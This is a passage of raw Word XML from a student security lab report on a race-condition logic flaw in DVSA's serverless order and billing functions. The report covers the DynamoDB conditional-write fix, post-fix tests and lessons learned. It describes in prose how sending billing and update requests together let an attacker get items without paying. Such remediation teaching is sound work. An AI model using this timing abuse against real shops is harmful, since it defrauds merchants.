        <w:t>update_order.py</w:t>
      </w:r>
      <w:r>
        <w:t>, the same race-condition test was repeated with a fresh order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6C6725" w14:textId="4C917D75" w:rsidR="00CF50AC" w:rsidRDefault="00000000" w:rsidP="00157756">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Test 1: </w:t>
      </w:r>
      <w:r w:rsidR="00157756">
        <w:t>Race-condition update should fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B93E73B" w14:textId="77777777" w:rsidR="00157756" w:rsidRDefault="00157756" w:rsidP="00157756">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>A new order was created and shipping information was added. Then the billing request and update request were sent close together, recreating the original race-condition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F50AC" w14:paraId="27AA38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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1667D02E" w14:textId="6C6020C1" w:rsidR="00CF50AC" w:rsidRDefault="00157756">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00157756">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ED57A1C" wp14:editId="1EBA5087">
                  <wp:extent cx="5943600" cy="1056640"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="172292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28274" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1056640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48416F2D" w14:textId="047BB785" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 11: </w:t>
      </w:r>
      <w:r w:rsidR="00157756" w:rsidRPr="00157756">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Terminal output showing the update request rejected with invalid state transition after the fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1152E2F3" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Test 2: Legitimate Workflow Still Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D93056" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>A normal sequential order workflow was verified:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E202597" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Created a new order → succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224EDD3C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Updated items (while still pending) → succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E2C342" w14:textId="11722E6C" w:rsidR="000106C5" w:rsidRDefault="000106C5" w:rsidP="000106C5">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Added shipping information → succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D697AD1" w14:textId="77777777" w:rsidR="000106C5" w:rsidRDefault="000106C5" w:rsidP="000106C5">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that legitimate order modification still works before billing, while post-billing updates are blocked by the new conditional status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CF50AC" w14:paraId="65666F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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6394FACD" w14:textId="0683D90A" w:rsidR="00CF50AC" w:rsidRDefault="000106C5">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000106C5">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B2A18E5" wp14:editId="6909CEDF">
                  <wp:extent cx="5943600" cy="3865245"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20285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6674" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="3865245"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25DDCED2" w14:textId="013E1FCE" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 12: </w:t>
      </w:r>
      <w:r w:rsidR="000106C5" w:rsidRPr="000106C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Terminal output or DVSA website showing that a normal order workflow still works correctly after the fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1EC7B" w14:textId="77777777" w:rsidR="000106C5" w:rsidRDefault="000106C5" w:rsidP="000106C5">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The screenshot shows that the application still accepts normal user actions before payment. The order was created successfully, the cart was updated successfully, and the shipping address was added successfully. Therefore, the fix prevents the race-condition abuse without breaking the normal order workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3963F064" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 9) Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09F2D6" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Table A: Structured Analysis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800"/>
        <w:gridCol w:w="2130"/>
        <w:gridCol w:w="2130"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF50AC" w14:paraId="7C8A3ACB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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AB5D2A8" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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C5F6BD9" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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63B91E33" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="213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4FC87779" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Normal Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="213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89C3AD7" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploit Behavior Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF50AC" w14:paraId="38D9203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E8524" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Logic Vulnerability (Race Condition)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906B3" w14:textId="5BDA10F8" w:rsidR="00CF50AC" w:rsidRDefault="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Once billing begins or the order leaves the open state, the order must no longer be modifiable. The billed amount must match the final order contents. Order updates should only be allowed while orderStatus = 100.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DDBC3" w14:textId="19AB8DB9" w:rsidR="00CF50AC" w:rsidRDefault="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Browser order workflow, API request/response for billing and update actions, Lambda source code in order_billing.py and update_order.py, DynamoDB DVSA-ORDERS-DB records, and terminal output from the race-condition test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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CB7EF" w14:textId="031BE9A0" w:rsidR="00CF50AC" w:rsidRDefault="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Normal order creation, item update, and shipping succeeded while the order was still open. After the fix, updates are allowed only before billing or while orderStatus = 100.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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74F48" w14:textId="15A87488" w:rsidR="00CF50AC" w:rsidRDefault="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Before the fix, billing and update requests could be sent close together against the same order. Because the status check and update were not enforced atomically, the order contents could be changed during the billing workflow, causing the final order state to differ from the amount billed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CB604D8" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC">
      <w:pPr>
        <w:spacing w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE4C003" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Table B: Deviation Analysis and Fix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1662"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="2075"/>
        <w:gridCol w:w="1577"/>
        <w:gridCol w:w="1417"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF50AC" w14:paraId="298071F1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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BA7225B" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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5DDF338" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Why This Is a Deviation</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EC8966B" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deviation Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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03F5001" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fix Applied (Where)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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07ECF4A2" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Post-Fix Verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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8719C28" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Optional Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF50AC" w14:paraId="750547D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FE200" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Logic Vulnerability (Race Condition)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DDD5C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The billing function processed payment based on a stale order state while the update function modified items concurrently.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7011F793" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>This violates the rule that billing amount must match final order contents.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C53A47B" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The attacker exploited the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>lack of state locking to receive items without paying.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9FA0C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Intentional misuse / security-relevant abuse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8948C" w14:textId="77777777" w:rsidR="00280B56" w:rsidRPr="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Added DynamoDB ConditionExpression checks in DVSA-ORDER-UPDATE / order_billing.py and DVSA-ORDER-UPDATE / update_order.py.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B279840" w14:textId="77777777" w:rsidR="00280B56" w:rsidRPr="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59089D79" w14:textId="77777777" w:rsidR="00280B56" w:rsidRPr="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In order_billing.py, the final billing update only succeeds if orderStatus = 100.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8E1D13" w14:textId="77777777" w:rsidR="00280B56" w:rsidRPr="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05E31400" w14:textId="78FE2DE0" w:rsidR="00CF50AC" w:rsidRDefault="00280B56" w:rsidP="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">In update_order.py, item updates only </w:t>
            </w:r>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>succeed if orderStatus = 100.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A712B" w14:textId="7CB74D70" w:rsidR="00CF50AC" w:rsidRDefault="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>After the fix, an update after the order leaves the open state returns "invalid state transition". Normal order creation, item update while open, and shipping still work correctly.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46220" w14:textId="2F575679" w:rsidR="00CF50AC" w:rsidRDefault="00280B56">
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00280B56">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Not measured / negligible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66A27B6A" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 10) Takeaway / Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504082B5" w14:textId="72B26504" w:rsidR="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>This lesson demonstrates that not all vulnerabilities are rooted in input validation or authentication failures. Logic flaws, particularly race conditions and TOCTOU bugs, can be equally damaging. In this case, the attacker did not need to bypass authentication or inject malicious code. They simply exploited the timing gap between billing and order modification to create an incorrect final order state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80BA64" w14:textId="7B89DB63" w:rsidR="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>In a serverless architecture, this problem is amplified because each Lambda invocation runs independently. There is no shared in-memory state or built-in locking between concurrent invocations. This means developers must explicitly implement state management and concurrency control using database-level conditional writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647B3B82" w14:textId="77777777" w:rsidR="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>The key design principles that prevent this class of vulnerability are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6D85E" w14:textId="77777777" w:rsidR="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strict state machine enforcement:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Define valid state transitions and enforce them atomically with conditional database operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C78ECD" w14:textId="77777777" w:rsidR="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimistic concurrency control:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Use DynamoDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>ConditionExpression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> checks so updates only succeed if the record is still in the expected state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04683EE3" w14:textId="086DE8D5" w:rsidR="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense in depth:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The state check should be enforced in the Lambda functions that modify DynamoDB records, not only in the router or frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E413493" w14:textId="77777777" w:rsidR="00280B56" w:rsidRDefault="00280B56" w:rsidP="00280B56">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>In real-world systems, race conditions in payment workflows can lead to financial losses, inventory discrepancies, and regulatory issues. This lesson underscores the importance of treating workflow integrity as a first-class security requirement in serverless application design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE4606" w14:textId="53567434" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC" w:rsidP="00280B56">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CF50AC" w:rsidSect="00B82184">
      <w:headerReference w:type="default" r:id="rId19"/>
      <w:footerReference w:type="default" r:id="rId20"/>
      <w:pgSz w:w="12240" w:h="15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ECB2C" w14:textId="77777777" w:rsidR="007935D0" w:rsidRDefault="007935D0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="793EFA5D" w14:textId="77777777" w:rsidR="007935D0" w:rsidRDefault="00793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C9133" w14:textId="4607CEB9" w:rsidR="00CF50AC"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330F91">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84DD" w14:textId="77777777" w:rsidR="007935D0" w:rsidRDefault="007935D0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00AE0A72" w14:textId="77777777" w:rsidR="007935D0" w:rsidRDefault="00793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DDA9C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="999999"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>ICS-344 — Lesson #8: Logic Vulnerabilities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80B6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81BEC104"/>
    <w:lvl w:ilvl="0" w:tplc="70445326">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="57CE109C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7444AEBA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="860A8DCC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="618812D2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6B644EF2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="177C311E">
      <w:numFmt w:val="decimal"/>
